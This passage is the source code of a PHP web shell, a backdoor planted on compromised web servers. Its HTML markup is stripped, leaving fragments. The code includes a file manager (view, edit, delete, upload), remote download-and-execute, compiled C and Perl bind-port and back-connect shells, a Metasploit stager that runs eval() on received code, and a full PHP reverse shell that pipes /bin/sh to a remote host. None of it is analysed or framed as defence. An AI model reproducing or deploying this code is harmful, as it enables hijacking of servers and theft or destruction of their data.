";} elseif(isset($_GET['view']) &&($_GET['view'] != "")){if(is_file($_GET['view'])){if(!isset($file))$file = magicboom($_GET['view']);if(!$win &&$posix){$name=@posix_getpwuid(@fileowner($file));$group=@posix_getgrgid(@filegroup($file));$owner = $name['name']." : ".$group['name'];}else {$owner = $user;}$filn = basename($file);echo "
Domainsusers
".$domains[1][0]."".$user['name']."
Filename".$file."
Size".ukuran($file)."
Permission".get_perms($file)."
Owner".$owner."
Create time".date("d-M-Y H:i",@filectime($file))."
Last modified".date("d-M-Y H:i",@filemtime($file))."
Last accessed".date("d-M-Y H:i",@fileatime($file))."
Actionsedit | rename | delete | download (gzip)
Viewtext | code | image
"; if(isset($_GET['type']) &&($_GET['type']=='image')){echo "
";} elseif(isset($_GET['type']) &&($_GET['type']=='code')){echo "
";$file = wordwrap(@file_get_contents($file),"240"," ");@highlight_string($file);echo "
";}else {echo "
";echo nl2br(htmlentities((@file_get_contents($file))));echo "
";}}elseif(is_dir($_GET['view'])){echo showdir($pwd,$prompt);}} elseif(isset($_GET['edit']) &&($_GET['edit'] != "")){if(isset($_POST['save'])){$file = $_POST['saveas'];$content = magicboom($_POST['content']);if($filez = @fopen($file,"w")){$time = date("d-M-Y H:i",time());if(@fwrite($filez,$content)) $msg = "file saved @ ".$time;else $msg = "failed to save";@fclose($filez);}else $msg = "permission denied";}if(!isset($file))$file = $_GET['edit'];if($filez = @fopen($file,"r")){$content = ""; while(!feof($filez)){$content .= htmlentities(str_replace("''","'",fgets($filez)));} @fclose($filez);};echo '
Save as  ';echo $msg;;echo '
';} elseif(isset($_GET['x']) &&($_GET['x'] == 'upload')){if(isset($_POST['uploadcomp'])){if(is_uploaded_file($_FILES['file']['tmp_name'])){$path = magicboom($_POST['path']);$fname = $_FILES['file']['name'];$tmp_name = $_FILES['file']['tmp_name'];$pindah = $path.$fname;$stat = @move_uploaded_file($tmp_name,$pindah);if ($stat) {$msg = "file uploaded to $pindah";}else $msg = "failed to upload $fname";}else $msg = "failed to upload $fname";} elseif(isset($_POST['uploadurl'])){$pilihan = trim($_POST['pilihan']);$wurl = trim($_POST['wurl']);$path = magicboom($_POST['path']);$namafile = download($pilihan,$wurl);$pindah = $path.$namafile;if(is_file($pindah)){$msg = "file uploaded to $pindah";}else $msg ="failed to upload $namafile";};echo '

Upload Files To The Server

Local

 


Remote
link
';echo $msg;;echo '
';} elseif(isset($_GET['x']) &&($_GET['x'] == 'back')){ if (isset($_POST['bind']) &&!empty($_POST['port']) &&!empty($_POST['bind_pass']) &&($_POST['use'] == 'C')) {$port = trim($_POST['port']);$passwrd = trim($_POST['bind_pass']);tulis("bdc.c",$port_bind_bd_c);exe("gcc -o bdc bdc.c");exe("chmod 777 bdc");@unlink("bdc.c");exe("./bdc ".$port." ".$passwrd." &");$scan = exe("ps aux");if(eregi("./bdc $por",$scan)){$msg = "

Process successed

";}else {$msg = "

Process Failed

";}} elseif (isset($_POST['bind']) &&!empty($_POST['port']) &&!empty($_POST['bind_pass']) &&($_POST['use'] == 'Perl')) {$port = trim($_POST['port']);$passwrd = trim($_POST['bind_pass']);tulis("bdp",$port_bind_bd_pl);exe("chmod 777 bdp");$p2=which("perl");exe($p2." bdp ".$port." &");$scan = exe("ps aux");if(eregi("$p2 bdp $port",$scan)){$msg = "

Process successed

";}else {$msg = "

Process Failed

";}} elseif (isset($_POST['backconn']) &&!empty($_POST['backport']) &&!empty($_POST['ip']) &&($_POST['use'] == 'C')) {$ip = trim($_POST['ip']);$port = trim($_POST['backport']);tulis("bcc.c",$back_connect_c);exe("gcc -o bcc bcc.c");exe("chmod 777 bcc");@unlink("bcc.c");exe("./bcc ".$ip." ".$port." &");$msg = "trying to connect to ".$ip." on port ".$port." ...";} elseif (isset($_POST['backconn']) &&!empty($_POST['backport']) &&!empty($_POST['ip']) &&($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']);$port = trim($_POST['backport']);tulis("bcp",$back_connect); exe("chmod +x bcp");$p2=which("perl");exe($p2." bcp ".$ip." ".$port." &"); $msg = "Trying to connect to ".$ip." on port ".$port." ...";} elseif (isset($_POST['expcompile']) &&!empty($_POST['wurl']) &&!empty($_POST['wcmd'])) {$pilihan = trim($_POST['pilihan']);$wurl = trim($_POST['wurl']);$namafile = download($pilihan,$wurl); if(is_file($namafile)){$msg = exe($wcmd);} else $msg = "error: file not found $namafile";};echo '



Bind PortBack connectdownload and Exec
Port
Password
Use

IP
Port
Use

url
cmd
';echo $msg;;echo '

'; error_reporting(0); function ss($t){if (!get_magic_quotes_gpc()) return trim(urldecode($t));return trim(urldecode(stripslashes($t)));} $s_my_ip = $_SERVER['REMOTE_ADDR'];$rsport = "443";$rsportb4 = $rsport;$rstarget4 = $s_my_ip;$s_result = "

Reverse shell ( php )

Your IP
Port

Metasploit Connection

Your IP
Port
"; echo $s_result; if($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port = $_POST['yport'];if ($ip == ""&&$port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($ipaddr,":")) {$ipaddr = "[".$ipaddr ."]";}if (is_callable('stream_socket_client')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = 'stream';}elseif (is_callable('fsockopen')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die();}$msgsock_type = 'stream';}elseif (is_callable('socket_create')){$msgsock = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);$res = socket_connect($msgsock,$ipaddr,$port);if (!$res) {die();}$msgsock_type = 'socket';}else {die();}switch ($msgsock_type){case 'stream': $len = fread($msgsock,4);break;case 'socket': $len = socket_read($msgsock,4);break;}if (!$len) {die();}$a = unpack("Nlen",$len);$len = $a['len'];$buffer = '';while (strlen($buffer) <$len){switch ($msgsock_type) {case 'stream': $buffer .= fread($msgsock,$len-strlen($buffer));break;case 'socket': $buffer .= socket_read($msgsock,$len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}} if(isset($_REQUEST['sqlportb4'])) $rsportb4 = ss($_REQUEST['sqlportb4']); if(isset($_REQUEST['rstarget4'])) $rstarget4 = ss($_REQUEST['rstarget4']); if ($_POST['xback_php']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = '/bin/sh';$daemon = 0;$debug = 0;if(function_exists('pcntl_fork')){$pid = pcntl_fork(); if ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon = 1;} umask(0);$sock = fsockopen($ip,$port,$errno,$errstr,30);if(!$sock) exit(1); $descriptorspec = array(0 =>array("pipe","r"),1 =>array("pipe","w"),2 =>array("pipe","w")); $process = proc_open($shell,$descriptorspec,$pipes); if(!is_resource($process)) exit(1); stream_set_blocking($pipes[0],0); stream_set_blocking($pipes[1],0); stream_set_blocking($pipes[2],0); stream_set_blocking($sock,0); while(1){if(feof($sock)) 
break;if(feof($pipes[1])) break;$read_a = array($sock,$pipes[1],$pipes[2]);$num_changed_sockets = stream_select($read_a,$write_a,$error_a,null); if(in_array($sock,$read_a)){$input = fread($sock,$chunk_size);fwrite($pipes[0],$input);} if(in_array($pipes[1],$read_a)){$input = fread($pipes[1],$chunk_size);fwrite($sock,$input);} if(in_array($pipes[2],$read_a)){$input = fread($pipes[2],$chunk_size);fwrite($sock,$input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);$rsres = " ";$s_result .= $rsres;}}elseif(isset($_GET['x']) &&($_GET['x'] == 'shell')){;echo '
';echo $prompt;;echo '
';}else{if(isset($_GET['delete']) &&($_GET['delete'] != "")){$file = $_GET['delete'];@unlink($file);} elseif(isset($_GET['fdelete']) &&($_GET['fdelete'] != "")){@rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));} elseif(isset($_GET['mkdir']) &&($_GET['mkdir'] != "")){$path = $pwd.$_GET['mkdir'];@mkdir($path);}$buff = showdir($pwd,$prompt);echo $buff;} ;echo '
';;